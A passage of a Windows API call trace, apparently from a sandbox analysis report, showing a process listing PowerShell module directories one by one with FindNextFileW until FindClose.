ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0286.157] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0286.158] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0286.158] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0286.158] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0286.158] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0286.159] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0286.159] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0286.159] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0286.159] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0286.159] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0286.160] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0286.160] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0286.160] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0286.160] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0286.161] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0286.161] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0286.161] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0286.161] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0286.162] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0286.162] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0286.162] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0286.163] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0286.163] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0286.163] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0286.163] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0286.163] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0286.164] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0286.164] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0286.164] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0286.165] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0286.165] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0286.165] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0286.165] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0286.166] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0286.166] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0286.166] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0286.166] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0286.166] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0286.167] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0286.167] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0286.167] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0286.167] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0286.168] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0286.168] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0286.168] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0286.168] FindClose (in: hFindFile=0x25b73f76910 | out: hFindFile=0x25b73f76910) returned 1 [0286.169] 